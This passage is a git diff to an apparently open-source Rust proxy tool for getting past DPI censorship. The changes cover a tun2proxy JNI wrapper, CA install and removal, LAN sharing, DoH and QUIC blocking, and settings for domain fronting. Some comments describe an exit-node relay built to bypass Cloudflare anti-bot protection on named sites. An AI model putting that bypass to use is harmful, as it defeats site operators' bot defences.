+    let out = safe(String::new(), AssertUnwindSafe(|| {
+        crate::tunnel_client::pipeline_debug::to_json()
+    }));
+    env.new_string(out).map(|s| s.into_raw()).unwrap_or(std::ptr::null_mut())
+}
+
+// ---------------------------------------------------------------------------
+// tun2proxy CLI API wrapper (dlsym — no fork or patch needed)
+// ---------------------------------------------------------------------------
+
+/// `Native.runTun2proxy(cliArgs, tunMtu)` -> int
+///
+/// Calls `tun2proxy_run_with_cli_args` from libtun2proxy.so via dlsym.
+/// This is the C API the tun2proxy maintainer recommends for callers that
+/// need full CLI flexibility (e.g. --udpgw-server). BLOCKS until shutdown.
+#[no_mangle]
+pub extern "system" fn Java_com_therealaleph_mhrv_Native_runTun2proxy<'a>(
+    mut env: JNIEnv<'a>,
+    _class: JClass,
+    cli_args: JString,
+    tun_mtu: jni::sys::jint,
+) -> jni::sys::jint {
+    safe(-1, AssertUnwindSafe(|| {
+        let args_str = jstring_to_string(&mut env, &cli_args);
+        tracing::info!("runTun2proxy: cli={}", args_str);
+
+        unsafe {
+            use std::ffi::{CStr, CString};
+
+            let lib = CString::new("libtun2proxy.so").unwrap();
+            let handle = libc::dlopen(lib.as_ptr(), libc::RTLD_NOW);
+            if handle.is_null() {
+                let err = CStr::from_ptr(libc::dlerror());
+                tracing::error!("dlopen libtun2proxy.so failed: {:?}", err);
+                return -10;
+            }
+
+            let sym = CString::new("tun2proxy_run_with_cli_args").unwrap();
+            let func = libc::dlsym(handle, sym.as_ptr());
+            if func.is_null() {
+                let err = CStr::from_ptr(libc::dlerror());
+                tracing::error!("dlsym tun2proxy_run_with_cli_args: {:?}", err);
+                libc::dlclose(handle);
+                return -11;
+            }
+
+            type RunFn = unsafe extern "C" fn(*const std::ffi::c_char, u16, bool) -> i32;
+            let run: RunFn = std::mem::transmute(func);
+            let c_args = CString::new(args_str).unwrap();
+            let rc = run(c_args.as_ptr(), tun_mtu as u16, false);
+            libc::dlclose(handle);
+            rc
+        }
+    }))
+}
diff --git a/src/bin/ui.rs b/src/bin/ui.rs
index 8409863b..e0f8f6d1 100644
--- a/src/bin/ui.rs
+++ b/src/bin/ui.rs
@@ -9,10 +9,11 @@ use tokio::runtime::Runtime;
 use tokio::sync::Mutex as AsyncMutex;
 use tokio::task::JoinHandle;
 
-use mhrv_rs::cert_installer::install_ca;
-use mhrv_rs::config::{Config, ScriptId};
+use mhrv_rs::cert_installer::{install_ca, reconcile_sudo_environment, remove_ca};
+use mhrv_rs::config::{Config, FrontingGroup, ScriptId};
 use mhrv_rs::data_dir;
 use mhrv_rs::domain_fronter::{DomainFronter, DEFAULT_GOOGLE_SNI_POOL};
+use mhrv_rs::lan_utils::{detect_lan_ip, is_share_on_lan};
 use mhrv_rs::mitm::{MitmCertManager, CA_CERT_FILE};
 use mhrv_rs::proxy_server::ProxyServer;
 use mhrv_rs::{scan_ips, scan_sni, test_cmd};
@@ -24,21 +25,38 @@ const LOG_MAX: usize = 200;
 
 fn main() -> eframe::Result<()> {
     let _ = rustls::crypto::ring::default_provider().install_default();
+    // Re-point HOME at the invoking user if this binary was launched
+    // under sudo (see cert_installer::reconcile_sudo_environment). Must
+    // run before any data_dir / firefox_profile_dirs call.
+    reconcile_sudo_environment();
     mhrv_rs::rlimit::raise_nofile_limit_best_effort();
 
     let shared = Arc::new(Shared::default());
     let (cmd_tx, cmd_rx) = std::sync::mpsc::channel::<Cmd>();
 
+    // Load the user's saved form first so we can seed the tracing filter
+    // with their saved log level. Otherwise the form's log-level combobox
+    // would only ever take effect via env var or after Save → restart, and
+    // users on the UI binary (issue #401) reasonably expect the saved
+    // config.json `log_level` to apply at boot like it does for the CLI.
+    let (form, load_err) = load_form();
+    let initial_toast = load_err.map(|e| (e, Instant::now()));
+
     // Hook tracing events into the Recent log panel. Without this every
     // tracing::info! / debug! / trace! the proxy emits gets swallowed and
     // the panel only ever shows our manual push_log calls, making the log
     // level selector look useless (issue #12 bug 2).
     //
-    // The env-filter respects RUST_LOG if set, otherwise defaults to info
-    // so users see routing decisions immediately without any knob-turning.
-    // When they start the proxy and Save the config, the log level from the
-    // config is applied to the in-process filter (see on_start below).
-    install_ui_tracing(shared.clone());
+    // Filter precedence (issue #401 fix in v1.8.2):
+    //   1. RUST_LOG env var if set                         — explicit override
+    //   2. Saved config's `log_level` (passed from form)   — what users mean
+    //      when they pick a level in the UI
+    //   3. "info,hyper=warn"                               — sensible default
+    //
+    // Save inside the running UI also installs the new filter via the
+    // reload handle (see `LOG_RELOAD` below), so users don't need to
+    // restart for a config change to take effect.
+    install_ui_tracing(shared.clone(), &form.log_level);
 
     let shared_bg = shared.clone();
     std::thread::Builder::new()
@@ -46,9 +64,6 @@ fn main() -> eframe::Result<()> {
         .spawn(move || background_thread(shared_bg, cmd_rx))
         .expect("failed to spawn background thread");
 
-    let (form, load_err) = load_form();
-    let initial_toast = load_err.map(|e| (e, Instant::now()));
-
     // Pick the renderer. Default is `glow` (OpenGL 2+) because that's
     // what we shipped through v1.0.x and it has the least binary-size
     // overhead. Users on older Windows boxes / RDP sessions / headless
@@ -68,7 +83,11 @@ fn main() -> eframe::Result<()> {
             .with_inner_size([WIN_WIDTH, WIN_HEIGHT])
             .with_min_inner_size([420.0, 400.0])
             .with_title(format!("mhrv-rs {}", VERSION)),
-        renderer: if use_wgpu { eframe::Renderer::Wgpu } else { eframe::Renderer::Glow },
+        renderer: if use_wgpu {
+            eframe::Renderer::Wgpu
+        } else {
+            eframe::Renderer::Glow
+        },
         ..Default::default()
     };
 
@@ -116,6 +135,22 @@ struct UiState {
     /// Set while a download of a release asset is in flight. `None` when
     /// idle or after a completed download has been acknowledged.
     download_in_progress: bool,
+    /// Set while an install-or-remove cert op is in flight. Install and
+    /// Remove share this single flag so they can't race each other:
+    /// clicking Install → Remove back-to-back would otherwise leave the
+    /// final trust/file state dependent on thread scheduling — an
+    /// in-flight install could re-trust the CA after Remove had already
+    /// deleted it, or vice versa. Both UI buttons disable while this
+    /// is set, and both handlers gate-and-flip it.
+    cert_op_in_progress: bool,
+    /// Set synchronously when `Cmd::Start` is received by the background
+    /// thread, cleared synchronously when `Cmd::Stop` completes. Broader
+    /// than `running` (which only flips after the MITM manager has
+    /// finished loading). Used to block `Remove CA` during the window
+    /// between start-click and `running = true` — otherwise a queued
+    /// `Cmd::RemoveCa` could delete `ca/` while the server is partway
+    /// through loading the keypair into memory.
+    proxy_active: bool,
     /// One-line status of the most recent download (Ok(path) or Err(msg)).
     last_download: Option<Result<std::path::PathBuf, String>>,
     last_download_at: Option<Instant>,
@@ -139,6 +174,7 @@ enum Cmd {
     Stop,
     Test(Config),
     InstallCa,
+    RemoveCa,
     CheckCaTrusted,
     PollStats,
     /// Probe a single SNI against the given google_ip. Result is written
@@ -181,9 +217,11 @@ struct App {
 
 #[derive(Clone)]
 struct FormState {
-    /// `"apps_script"` (default) or `"google_only"`. Controls whether the
-    /// Apps Script relay is wired up at all. In `google_only`, the form
-    /// tolerates an empty script_id / auth_key.
+    /// `"apps_script"` (default), `"direct"`, or `"full"`. Controls
+    /// whether the Apps Script relay is wired up at all. In `direct`,
+    /// the form tolerates an empty script_id / auth_key.
+    /// On load we normalize the legacy `"google_only"` string to
+    /// `"direct"` so the next save rewrites the on-disk config.
     mode: String,
     script_id: String,
     auth_key: String,
@@ -209,11 +247,57 @@ struct FormState {
     show_log: bool,
     fetch_ips_from_api: bool,
     max_ips_to_scan: usize,
-    scan_batch_size:usize,
+    scan_batch_size: usize,
     google_ip_validation: bool,
     normalize_x_graphql: bool,
     youtube_via_relay: bool,
     passthrough_hosts: Vec<String>,
+    /// Round-tripped from config.json so the UI's save path doesn't
+    /// drop the user's setting. Not currently exposed as a UI control;
+    /// users edit `block_quic` directly in `config.json` (Issue #213).
+    block_quic: bool,
+    /// Round-tripped from config.json and exposed beside QUIC blocking.
+    /// Default true to push WebRTC apps toward TCP TURN instead of slow
+    /// UDP ICE retries.
+    block_stun: bool,
+    /// Round-tripped from config.json. Not exposed as a UI control —
+    /// users edit `disable_padding` directly when needed (Issue #391).
+    /// Default false (padding active).
+    disable_padding: bool,
+    /// Round-tripped from config.json. Not exposed as a UI control —
+    /// users edit `force_http1` directly when needed. Default false
+    /// (HTTP/2 multiplexing on the relay leg active).
+    force_http1: bool,
+    /// Round-tripped from config.json. Not exposed in the UI form yet —
+    /// the bypass-DoH default is the right answer for almost everyone
+    /// (DoH already encrypts, the tunnel was just adding latency), so
+    /// this is a config-only opt-out. See config.rs `tunnel_doh`.
+    tunnel_doh: bool,
+    /// User-supplied DoH hostnames added to the built-in default list,
+    /// round-tripped from config.json. See config.rs `bypass_doh_hosts`.
+    bypass_doh_hosts: Vec<String>,
+    /// PR #763: when true, immediately reject browser DoH CONNECTs so the
+    /// browser falls back to system DNS (tun2proxy virtual DNS — instant).
+    /// Round-tripped from config.json. Desktop UI doesn't expose a toggle
+    /// yet — Android does. See config.rs `block_doh`.
+    block_doh: bool,
+    /// Multi-edge fronting groups. Round-tripped from config.json so
+    /// the UI's Save doesn't drop the user's hand-edited groups —
+    /// there is no UI editor for these yet, only file-edited config.
+    /// See config.rs `fronting_groups`.
+    fronting_groups: Vec<FrontingGroup>,
+    /// Auto-blacklist tuning + per-batch timeout. Config-only knobs (no UI
+    /// fields yet — power-user file edit). Round-tripped through FormState
+    /// so Save preserves the user's hand-edited values. See config.rs
+    /// `auto_blacklist_*` and `request_timeout_secs`.
+    auto_blacklist_strikes: u32,
+    auto_blacklist_window_secs: u64,
+    auto_blacklist_cooldown_secs: u64,
+    request_timeout_secs: u64,
+    /// Optional second-hop exit node for CF-anti-bot bypass (chatgpt.com /
+    /// claude.ai / grok.com / x.com). Config-only — no UI editor yet.
+    /// See `assets/exit_node/` for the generic exit-node handler.
+    exit_node: mhrv_rs::config::ExitNodeConfig,
 }
 
 #[derive(Clone, Debug)]
@@ -254,7 +338,10 @@ fn load_form() -> (FormState, Option<String>) {
             }
         }
     } else {
-        tracing::info!("config: no config found at {} — starting with defaults", path.display());
+        tracing::info!(
+            "config: no config found at {} — starting with defaults",
+            path.display()
+        );
         (None, None)
     };
     let form = if let Some(c) = existing {
@@ -268,8 +355,18 @@ fn load_form() -> (FormState, Option<String>) {
             },
         };
         let sni_pool = sni_pool_for_form(c.sni_hosts.as_deref(), &c.front_domain);
+        // Normalize the legacy `google_only` mode string on load. The
+        // backend's `mode_kind()` accepts the alias forever, but storing
+        // it as `direct` in the form means the next Save rewrites the
+        // on-disk config to the new name — one-way migration, no warn
+        // on every startup.
+        let mode_normalized = if c.mode == "google_only" {
+            "direct".to_string()
+        } else {
+            c.mode.clone()
+        };
         FormState {
-            mode: c.mode.clone(),
+            mode: mode_normalized,
             script_id: sid,
             auth_key: c.auth_key,
             google_ip: c.google_ip,
@@ -286,13 +383,26 @@ fn load_form() -> (FormState, Option<String>) {
             sni_custom_input: String::new(),
             sni_editor_open: false,
             show_log: true,
-            fetch_ips_from_api:c.fetch_ips_from_api,
-            max_ips_to_scan:c.max_ips_to_scan,
+            fetch_ips_from_api: c.fetch_ips_from_api,
+            max_ips_to_scan: c.max_ips_to_scan,
             google_ip_validation: c.google_ip_validation,
-            scan_batch_size:c.scan_batch_size,
+            scan_batch_size: c.scan_batch_size,
             normalize_x_graphql: c.normalize_x_graphql,
             youtube_via_relay: c.youtube_via_relay,
             passthrough_hosts: c.passthrough_hosts.clone(),
+            block_quic: c.block_quic,
+            block_stun: c.block_stun,
+            disable_padding: c.disable_padding,
+            force_http1: c.force_http1,
+            tunnel_doh: c.tunnel_doh,
+            bypass_doh_hosts: c.bypass_doh_hosts.clone(),
+            block_doh: c.block_doh,
+            fronting_groups: c.fronting_groups.clone(),
+            auto_blacklist_strikes: c.auto_blacklist_strikes,
+            auto_blacklist_window_secs: c.auto_blacklist_window_secs,
+            auto_blacklist_cooldown_secs: c.auto_blacklist_cooldown_secs,
+            request_timeout_secs: c.request_timeout_secs,
+            exit_node: c.exit_node.clone(),
         }
     } else {
         FormState {
@@ -313,13 +423,28 @@ fn load_form() -> (FormState, Option<String>) {
             sni_custom_input: String::new(),
             sni_editor_open: false,
             show_log: true,
-            fetch_ips_from_api:false,
-            max_ips_to_scan:100,
-            google_ip_validation:true,
-            scan_batch_size:500,
+            fetch_ips_from_api: false,
+            max_ips_to_scan: 100,
+            google_ip_validation: true,
+            scan_batch_size: 500,
             normalize_x_graphql: false,
             youtube_via_relay: false,
             passthrough_hosts: Vec::new(),
+            block_quic: true,
+            block_stun: true,
+            disable_padding: false,
+            force_http1: false,
+            tunnel_doh: true,
+            bypass_doh_hosts: Vec::new(),
+            block_doh: true,
+            fronting_groups: Vec::new(),
+            // Defaults match `default_auto_blacklist_*` and
+            // `default_request_timeout_secs` in src/config.rs.
+            auto_blacklist_strikes: 3,
+            auto_blacklist_window_secs: 30,
+            auto_blacklist_cooldown_secs: 120,
+            request_timeout_secs: 30,
+            exit_node: mhrv_rs::config::ExitNodeConfig::default(),
         }
     };
     (form, load_err)
@@ -371,8 +496,10 @@ fn sni_pool_for_form(user: Option<&[String]>, front_domain: &str) -> Vec<SniRow>
 
 impl FormState {
     fn to_config(&self) -> Result<Config, String> {
-        let is_google_only = self.mode == "google_only";
-        if !is_google_only {
+        // `direct` and the legacy `google_only` alias both run without
+        // an Apps Script relay, so neither requires a script_id.
+        let is_direct = self.mode == "direct" || self.mode == "google_only";
+        if !is_direct {
             if self.script_id.trim().is_empty() {
                 return Err("Apps Script ID is required".into());
             }
@@ -450,10 +577,10 @@ impl FormState {
                     Some(active)
                 }
             },
-            fetch_ips_from_api:self.fetch_ips_from_api,
+            fetch_ips_from_api: self.fetch_ips_from_api,
             max_ips_to_scan: self.max_ips_to_scan,
-            google_ip_validation:self.google_ip_validation,
-            scan_batch_size:self.scan_batch_size,
+            google_ip_validation: self.google_ip_validation,
+            scan_batch_size: self.scan_batch_size,
             normalize_x_graphql: self.normalize_x_graphql,
             // UI form doesn't expose youtube_via_relay yet — it's a
             // config-only flag for now. Passed through from the loaded
@@ -462,6 +589,50 @@ impl FormState {
             // Similarly config-only for now; round-trips through the
             // file so the UI doesn't drop the user's entries on save.
             passthrough_hosts: self.passthrough_hosts.clone(),
+            // Issue #213: block_quic is config-only for now (no UI
+            // control yet). Round-trip through the file so save
+            // doesn't drop a user-set true.
+            block_quic: self.block_quic,
+            block_stun: self.block_stun,
+            // Issue #391: disable_padding is config-only for now.
+            // Round-trip preserves the user's choice.
+            disable_padding: self.disable_padding,
+            // HTTP/2 multiplexing kill switch. Config-only for now;
+            // round-trip preserves the user's choice across Save.
+            force_http1: self.force_http1,
+            // DoH bypass is enabled-by-default with `tunnel_doh = false`.
+            // Round-trip the user's choice (and any extra hostnames they
+            // added) so save doesn't drop them.
+            tunnel_doh: self.tunnel_doh,
+            bypass_doh_hosts: self.bypass_doh_hosts.clone(),
+            // PR #763: block_doh defaults to true (rejects browser DoH so
+            // tun2proxy's virtual DNS handles name lookups, saving the
+            // ~1.5s tunnel round-trip per DNS query). Desktop UI doesn't
+            // expose a toggle yet (Android does), so this is a config-only
+            // round-trip — we keep whatever the user has in config.json.
+            block_doh: self.block_doh,
+            // Multi-edge fronting groups: file-edited only for now,
+            // round-tripped through the UI so Save doesn't drop them.
+            fronting_groups: self.fronting_groups.clone(),
+            // PR #448 (Android): adaptive coalesce window. Desktop UI
+            // doesn't expose sliders for these yet (Android does), so
+            // we pass 0 to keep the compiled defaults (40ms step,
+            // 1000ms max). Round-trip planned for the v1.8.x desktop UI
+            // batch alongside the system-proxy toggle (#432).
+            coalesce_step_ms: 0,
+            coalesce_max_ms: 0,
+            // Auto-blacklist + batch timeout: config-only knobs (#391,
+            // #444, #430). Round-trip through FormState so Save doesn't
+            // drop hand-edited values. UI editor planned alongside the
+            // v1.8.x desktop UI batch.
+            auto_blacklist_strikes: self.auto_blacklist_strikes,
+            auto_blacklist_window_secs: self.auto_blacklist_window_secs,
+            auto_blacklist_cooldown_secs: self.auto_blacklist_cooldown_secs,
+            request_timeout_secs: self.request_timeout_secs,
+            // Exit-node config (CF-anti-bot bypass for chatgpt.com / claude.ai
+            // / grok.com / x.com). Round-trip through FormState — config-only
+            // editing for now, UI editor planned for v1.9.x desktop UI batch.
+            exit_node: self.exit_node.clone(),
         })
     }
 }
@@ -513,12 +684,68 @@ struct ConfigWire<'a> {
     max_ips_to_scan: usize,
     scan_batch_size: usize,
     google_ip_validation: bool,
+    /// Default false (= bypass DoH). Only emitted when explicitly true
+    /// so unchanged configs stay clean.
+    #[serde(skip_serializing_if = "is_false")]
+    tunnel_doh: bool,
+    #[serde(skip_serializing_if = "Vec::is_empty")]
+    bypass_doh_hosts: &'a Vec<String>,
+    /// PR #763: default true (= browser DoH rejected, system DNS used).
+    /// Skip when matching default to keep unchanged configs clean —
+    /// emit only when the user has explicitly disabled the block.
+    #[serde(skip_serializing_if = "is_true")]
+    block_doh: bool,
+    /// Default true. Emit only when the user disables STUN/TURN blocking.
+    #[serde(skip_serializing_if = "is_true")]
+    block_stun: bool,
+    #[serde(skip_serializing_if = "Vec::is_empty")]
+    fronting_groups: &'a Vec<FrontingGroup>,
+    /// Auto-blacklist tuning + batch timeout (#391, #444, #430). Skip
+    /// serialization when matching the historical defaults so unchanged
+    /// configs stay clean — only emitted when the user has explicitly
+    /// tuned them.
+    #[serde(skip_serializing_if = "is_default_strikes")]
+    auto_blacklist_strikes: u32,
+    #[serde(skip_serializing_if = "is_default_window_secs")]
+    auto_blacklist_window_secs: u64,
+    #[serde(skip_serializing_if = "is_default_cooldown_secs")]
+    auto_blacklist_cooldown_secs: u64,
+    #[serde(skip_serializing_if = "is_default_timeout_secs")]
+    request_timeout_secs: u64,
+    /// HTTP/2 multiplexing kill switch. Default false (h2 active); only
+    /// emitted on save when the user has explicitly disabled h2, so
+    /// unchanged configs stay clean.
+    #[serde(skip_serializing_if = "is_false")]
+    force_http1: bool,
+    /// Exit-node config (CF-anti-bot bypass for chatgpt.com / claude.ai /
+    /// grok.com / x.com via exit-node second-hop relay). Skip when fully
+    /// default (disabled with no URL/PSK/hosts) so configs without
+    /// exit-node setup stay clean. Round-tripped through FormState so
+    /// Save preserves user-edited values.
+    #[serde(skip_serializing_if = "is_default_exit_node")]
+    exit_node: &'a mhrv_rs::config::ExitNodeConfig,
+}
+
+fn is_default_strikes(v: &u32) -> bool { *v == 3 }
+fn is_default_window_secs(v: &u64) -> bool { *v == 30 }
+fn is_default_cooldown_secs(v: &u64) -> bool { *v == 120 }
+fn is_default_timeout_secs(v: &u64) -> bool { *v == 30 }
+fn is_default_exit_node(en: &&mhrv_rs::config::ExitNodeConfig) -> bool {
+    !en.enabled
+        && en.relay_url.is_empty()
+        && en.psk.is_empty()
+        && en.hosts.is_empty()
+        && (en.mode.is_empty() || en.mode == "selective")
 }
 
 fn is_false(b: &bool) -> bool {
     !*b
 }
 
+fn is_true(b: &bool) -> bool {
+    *b
+}
+
 fn is_zero_u8(v: &u8) -> bool {
     *v == 0
 }
@@ -561,6 +788,17 @@ impl<'a> From<&'a Config> for ConfigWire<'a> {
             max_ips_to_scan: c.max_ips_to_scan,
             scan_batch_size: c.scan_batch_size,
             google_ip_validation: c.google_ip_validation,
+            tunnel_doh: c.tunnel_doh,
+            bypass_doh_hosts: &c.bypass_doh_hosts,
+            block_doh: c.block_doh,
+            block_stun: c.block_stun,
+            fronting_groups: &c.fronting_groups,
+            auto_blacklist_strikes: c.auto_blacklist_strikes,
+            auto_blacklist_window_secs: c.auto_blacklist_window_secs,
+            auto_blacklist_cooldown_secs: c.auto_blacklist_cooldown_secs,
+            request_timeout_secs: c.request_timeout_secs,
+            force_http1: c.force_http1,
+            exit_node: &c.exit_node,
         }
     }
 }
@@ -584,10 +822,7 @@ fn section(ui: &mut egui::Ui, title: &str, body: impl FnOnce(&mut egui::Ui)) {
     ui.add_space(2.0);
     let frame = egui::Frame::none()
         .fill(egui::Color32::from_rgb(28, 30, 34))
-        .stroke(egui::Stroke::new(
-            1.0,
-            egui::Color32::from_rgb(50, 54, 60),
-        ))
+        .stroke(egui::Stroke::new(1.0, egui::Color32::from_rgb(50, 54, 60)))
         .rounding(6.0)
         .inner_margin(egui::Margin::same(10.0));
     frame.show(ui, body);
@@ -596,10 +831,14 @@ fn section(ui: &mut egui::Ui, title: &str, body: impl FnOnce(&mut egui::Ui)) {
 /// A primary accent-filled button. Used for the headline action in a row
 /// (Start / Stop / SNI pool).
 fn primary_button(text: &str) -> egui::Button<'_> {
-    egui::Button::new(egui::RichText::new(text).color(egui::Color32::WHITE).strong())
-        .fill(ACCENT)
-        .min_size(egui::vec2(120.0, 28.0))
-        .rounding(4.0)
+    egui::Button::new(
+        egui::RichText::new(text)
+            .color(egui::Color32::WHITE)
+            .strong(),
+    )
+    .fill(ACCENT)
+    .min_size(egui::vec2(120.0, 28.0))
+    .rounding(4.0)
 }
 
 /// A compact form row: label on the left (fixed width for vertical alignment),
@@ -608,17 +847,18 @@ fn form_row(
     ui: &mut egui::Ui,
     label: &str,
     hover: Option<&str>,
-    widget: impl FnOnce(&mut egui::Ui),
+    widget: impl FnOnce(&mut egui::Ui, egui::Id),
 ) {
     ui.horizontal(|ui| {
         let resp = ui.add_sized(
             [120.0, 20.0],
             egui::Label::new(egui::RichText::new(label).color(egui::Color32::from_gray(200))),
         );
+        let label_id = resp.id;
         if let Some(h) = hover {
             resp.on_hover_text(h);
         }
-        widget(ui);
+        widget(ui, label_id);
     });
 }
 
@@ -697,19 +937,20 @@ impl eframe::App for App {
 
             // ── Section: Mode ─────────────────────────────────────────────
             // Surfacing the mode at the top of the form because it changes
-            // which of the sections below are actually used. google_only is
-            // a bootstrap mode for users who don't yet have internet access
-            // to deploy Code.gs — once deployed, they switch back to
-            // apps_script.
+            // which of the sections below are actually used. `direct` runs
+            // without the Apps Script relay (Google edge + any configured
+            // fronting_groups via the SNI-rewrite tunnel only) — useful as
+            // a bootstrap to deploy Code.gs, or as a standalone mode for
+            // users who only need access to fronting-group targets.
             section(ui, "Mode", |ui| {
                 form_row(ui, "Mode", Some(
                     "apps_script: DPI bypass via Apps Script relay (needs cert).\n\
                      full: tunnel ALL traffic through Apps Script + tunnel node (no cert needed).\n\
-                     google_only: bootstrap — direct SNI-rewrite tunnel to *.google.com only."
-                ), |ui| {
+                     direct: SNI-rewrite tunnel only — no relay (Google edge + any fronting_groups)."
+                ), |ui, _label_id| {
                     egui::ComboBox::from_id_source("mode")
                         .selected_text(match self.form.mode.as_str() {
-                            "google_only" => "Google-only (bootstrap)",
+                            "direct" | "google_only" => "Direct (no relay)",
                             "full" => "Full tunnel (no cert)",
                             _ => "Apps Script (MITM)",
                         })
@@ -726,16 +967,16 @@ impl eframe::App for App {
                             );
                             ui.selectable_value(
                                 &mut self.form.mode,
-                                "google_only".into(),
-                                "Google-only (bootstrap)",
+                                "direct".into(),
+                                "Direct (no relay)",
                             );
                         });
                 });
-                if self.form.mode == "google_only" {
+                if self.form.mode == "direct" || self.form.mode == "google_only" {
                     ui.horizontal(|ui| {
                         ui.add_space(120.0 + 8.0);
                         ui.small(egui::RichText::new(
-                            "Bootstrap mode — reach script.google.com to deploy Code.gs, then switch back to Apps Script.",
+                            "Direct mode — SNI-rewrite tunnel only. Reach the Google edge (and any configured fronting_groups) without an Apps Script relay.",
                         )
                         .color(OK_GREEN));
                     });
@@ -751,19 +992,20 @@ impl eframe::App for App {
                 }
             });
 
-            let google_only = self.form.mode == "google_only";
+            let direct_mode = self.form.mode == "direct" || self.form.mode == "google_only";
 
             // ── Section: Apps Script relay ────────────────────────────────
             section(ui, "Apps Script relay", |ui| {
-                ui.add_enabled_ui(!google_only, |ui| {
+                ui.add_enabled_ui(!direct_mode, |ui| {
                     form_row(ui, "Deployment IDs", Some(
                         "One deployment ID per line. Proxy round-robins between them and sidelines \
                          any ID that hits its daily quota for 10 minutes before retrying."
-                    ), |ui| {
+                    ), |ui, label_id| {
                         ui.add(egui::TextEdit::multiline(&mut self.form.script_id)
                             .hint_text("one deployment ID per line")
                             .desired_width(f32::INFINITY)
-                            .desired_rows(3));
+                            .desired_rows(3))
+                        .labelled_by(label_id);
                     });
 
                     let id_count = self.form.script_id
@@ -785,19 +1027,21 @@ impl eframe::App for App {
 
                     form_row(ui, "Auth key", Some(
                         "Same value as AUTH_KEY inside your Code.gs."
-                    ), |ui| {
+                    ), |ui, label_id| {
                         ui.add(egui::TextEdit::singleline(&mut self.form.auth_key)
                             .password(!self.form.show_auth_key)
-                            .desired_width(f32::INFINITY));
+                            .desired_width(f32::INFINITY))
+                        .labelled_by(label_id);
                     });
                 });
             });
 
             // ── Section: Network ──────────────────────────────────────────
             section(ui, "Network", |ui| {
-                form_row(ui, "Google IP", None, |ui| {
+                form_row(ui, "Google IP", None, |ui, label_id| {
                     ui.add(egui::TextEdit::singleline(&mut self.form.google_ip)
-                        .desired_width(f32::INFINITY));
+                        .desired_width(f32::INFINITY))
+                    .labelled_by(label_id);
                 });
                 ui.horizontal(|ui| {
                     ui.add_space(120.0 + 8.0);
@@ -835,15 +1079,104 @@ impl eframe::App for App {
                     }
                 });
 
-                form_row(ui, "Front domain", None, |ui| {
+                form_row(ui, "Front domain", None, |ui, label_id| {
                     ui.add(egui::TextEdit::singleline(&mut self.form.front_domain)
-                        .desired_width(f32::INFINITY));
+                        .desired_width(f32::INFINITY))
+                    .labelled_by(label_id);
                 });
 
-                form_row(ui, "Listen host", None, |ui| {
-                    ui.add(egui::TextEdit::singleline(&mut self.form.listen_host)
-                        .desired_width(f32::INFINITY));
+                // Network sharing: phones, tablets, other laptops on the
+                // same Wi-Fi can use this proxy when the bind address is
+                // 0.0.0.0 instead of 127.0.0.1. We expose this as a
+                // single-checkbox UI rather than the raw `listen_host`
+                // text field — typing `0.0.0.0` from memory is enough of
+                // a friction point that almost no one does it. Power
+                // users with a custom bind IP (specific NIC) can still
+                // edit `listen_host` directly in `config.json`; we
+                // detect that case and show a "Custom bind" badge so
+                // the checkbox doesn't silently overwrite their setting
+                // on the next Save.
+                //
+                // Snapshot the relevant flags before entering form_row's
+                // closure — we need to mutate `self.form.listen_host`
+                // inside the closure when the checkbox toggles, so we
+                // can't hold a borrow on it through the closure.
+                let listen_host_snapshot = self.form.listen_host.trim().to_string();
+                let listen_port_snapshot = self.form.listen_port.trim().to_string();
+                let socks5_port_snapshot = self.form.socks5_port.trim().to_string();
+                let was_share_on_lan = is_share_on_lan(&listen_host_snapshot);
+                let lower_snapshot = listen_host_snapshot.to_ascii_lowercase();
+                let is_custom_bind = !listen_host_snapshot.is_empty()
+                    && !was_share_on_lan
+                    && lower_snapshot != "127.0.0.1"
+                    && lower_snapshot != "localhost";
+                let mut new_listen_host: Option<String> = None;
+                form_row(ui, "Network", Some(
+                    "By default the proxy is reachable only from this computer. \
+                     Turn this on to let phones, tablets, and other laptops on the \
+                     same Wi-Fi (or a hotspot you're sharing) use it too. The \
+                     other devices then point their HTTP / SOCKS5 proxy at the \
+                     LAN IP shown below. Make sure your firewall lets in the proxy \
+                     port — macOS pops up a Firewall prompt the first time."
+                ), |ui, _label_id| {
+                    if is_custom_bind {
+                        // The user manually wrote a specific bind IP —
+                        // don't let the checkbox stomp on it. Show what
+                        // they have and tell them to edit config.json
+                        // if they want to change it.
+                        ui.vertical(|ui| {
+                            ui.label(egui::RichText::new(format!(
+                                "Custom bind: {}",
+                                listen_host_snapshot
+                            )).color(egui::Color32::from_rgb(220, 180, 100)));
+                            ui.small("Edit `listen_host` in config.json to change.");
+                        });
+                    } else {
+                        let mut share = was_share_on_lan;
+                        if ui.checkbox(&mut share, "Share with other devices on my Wi-Fi / network").changed() {
+                            new_listen_host = Some(if share {
+                                "0.0.0.0".to_string()
+                            } else {
+                                "127.0.0.1".to_string()
+                            });
+                        }
+                        if share {
+                            // detect_lan_ip() opens a UDP socket and
+                            // asks the kernel which interface a packet
+                            // to a public IP would use. Cheap (no
+                            // syscall does network I/O) and accurate
+                            // (it's the same selection any outbound
+                            // connection would make).
+                            match detect_lan_ip() {
+                                Some(ip) => {
+                                    let port = if listen_port_snapshot.is_empty() {
+                                        "8085"
+                                    } else {
+                                        listen_port_snapshot.as_str()
+                                    };
+                                    let socks_port = if socks5_port_snapshot.is_empty() {
+                                        "8086"
+                                    } else {
+                                        socks5_port_snapshot.as_str()
+                                    };
+                                    ui.small(egui::RichText::new(format!(
+                                        "Other devices: HTTP {}:{}  ·  SOCKS5 {}:{}",
+                                        ip, port, ip, socks_port,
+                                    )).color(egui::Color32::from_rgb(120, 200, 140)));
+                                }
+                                None => {
+                                    ui.small(egui::RichText::new(
+                                        "Couldn't detect your LAN IP. Find it in System Settings \
+                                         → Network → Wi-Fi → Details (macOS) or `ipconfig` (Windows)."
+                                    ).color(egui::Color32::from_rgb(220, 180, 100)));
+                                }
+                            }
+                        }
+                    }
                 });
+                if let Some(updated) = new_listen_host {
+                    self.form.listen_host = updated;
+                }
 
                 ui.horizontal(|ui| {
                     ui.add_sized(
@@ -851,11 +1184,15 @@ impl eframe::App for App {
                         egui::Label::new(egui::RichText::new("Ports")
                             .color(egui::Color32::from_gray(200))),
                     );
-                    ui.label(egui::RichText::new("HTTP").small());
-                    ui.add(egui::TextEdit::singleline(&mut self.form.listen_port).desired_width(70.0));
+                    let http_label = ui.label(egui::RichText::new("HTTP").small());
+                    ui.add(egui::TextEdit::singleline(&mut self.form.listen_port)
+                        .desired_width(70.0))
+                    .labelled_by(http_label.id);
                     ui.add_space(10.0);
-                    ui.label(egui::RichText::new("SOCKS5").small());
-                    ui.add(egui::TextEdit::singleline(&mut self.form.socks5_port).desired_width(70.0));
+                    let socks_label = ui.label(egui::RichText::new("SOCKS5").small());
